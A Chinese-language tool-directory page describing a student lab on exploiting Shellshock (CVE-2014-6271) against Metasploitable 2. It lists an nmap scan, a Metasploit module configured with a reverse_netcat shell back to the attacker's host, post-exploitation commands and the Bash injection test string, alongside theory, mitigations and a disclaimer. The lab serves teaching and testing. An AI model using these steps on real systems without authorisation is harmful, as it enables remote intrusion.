Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Shellshock-CVE-2014-6271-Exploitation-and-Analysis — 教育实验室,演示利用和分析 Shellshock (CVE-2014-6271),使用 Metasploit 在 Metasploitable 2 上,包含逐步扫描、反向 shell 和后渗透命令。 | Kitploit
工具/GitHubGitHub/rajmadhusankha/shellshock-cve-2014-6271-exploitation-and-analysis
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育实验室与实践
GitHubrajmadhusankha/shellshock-cve-2014-6271-exploitation-and-analysis

Shellshock-CVE-2014-6271-Exploitation-and-Analysis

教育实验室,演示利用和分析 Shellshock (CVE-2014-6271),使用 Metasploit 在 Metasploitable 2 上,包含逐步扫描、反向 shell 和后渗透命令。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
1年前尚未审核

🐚 Shellshock(CVE-2014-6271) – 利用与分

📌 概述

这是漏洞评估与渗透测试 – II 课程的实践作业,重点在于对 Shellshock 漏洞(CVE-2014-6271)的利用与分析。
所有操作均在受控实验环境中进行,使用 Metasploitable 2(目标机)和 Kali Linux(攻击机)。


🛠 使用工具

  • 💻 Kali Linux – 攻击机
  • 🖥 Metasploitable 2 – 易受攻击的目标
  • 🔍 Nmap – 扫描与服务检测
  • 🎯 Metasploit Framework – 漏洞利用

🔍 漏洞概述

  • 类型: 远程代码执行(RCE)
  • 受影响组件: GNU Bash(版本 1.14–4.3)
  • 影响: 通过特制的环境变量执行任意命令
  • CVSS 评分: 10.0(严重)
  • 利用向量: 通常通过 HTTP 头部传递给 CGI 脚本

⚡ 实验步骤

1️⃣ 扫描目标

root@kitploit:~
 nmap -sS -sV <target-ip>

2️⃣ 启动 Metasploit msfconsole

3️⃣ 加载利用模块 use exploit/multi/http/apache_mod_cgi_bash_env_exec

4️⃣ 配置利用

root@kitploit:~
set RHOST <target-ip>
set TARGETURI /cgi-bin/status
set LHOST <your-kali-ip>
set PAYLOAD cmd/unix/reverse_netcat

5️⃣ 运行利用 exploit

📸 演示内容

root@kitploit:~
📡 Nmap 扫描结果

⚙️ Metasploit 配置

🔄 反弹 Shell 会话输出

🛠 后渗透命令:

whoami
uname -a
ifconfig

📖 理论背景 什么是 Shellshock?

Shellshock 是 GNU Bash shell 中的一个漏洞,允许攻击者通过向环境变量中注入命令来执行任意代码。 该漏洞于 2014 年 9 月被发现,编号为 CVE-2014-6271,影响 Bash v1.14 到 v4.3 版本。 工作原理

Bash 在处理环境变量中的函数定义时存在缺陷,会在函数体之后额外执行命令。 在使用 CGI 脚本的 Web 服务器上,HTTP 头部会成为环境变量,这就构成了一个简单的攻击路径。

示例:

env x='() { :;}; echo vulnerable' bash -c "echo test"

如果存在漏洞,会输出 vulnerable。 影响

root@kitploit:~
**完全远程代码执行(RCE)**,无需身份验证

可通过简单的 HTTP 请求利用

被用于僵尸网络、蠕虫、定向攻击

影响了数百万台服务器、路由器和物联网设备

真实世界中的利用案例

root@kitploit:~
Yahoo 服务器 – 通过 CGI 脚本传播恶意软件

Wopbot 僵尸网络 – 自动化利用

QNAP NAS – 远程 shell 访问与恶意软件植入

自我复制蠕虫 – 向新的脆弱主机传播

🛡 预防与缓解

root@kitploit:~
🔄 立即更新 Bash

🚫 禁用不必要的 CGI 脚本

🔥 使用防火墙阻止不必要的流量

🛡 部署 Web 应用防火墙(WAF)

📜 监控 HTTP 请求日志

👤 应用最小权限原则

⚠️ 免责声明

本项目仅供教育目的使用。 所有测试均在受控实验环境中进行。 ❌ 禁止在未经授权的系统上使用这些技术。

👨‍💻 作者:Janith Madhusankha 🎓 课程:网络与安全荣誉学士学位(BICT Hons) 🏫 机构:斯里兰卡东南大学

下载工具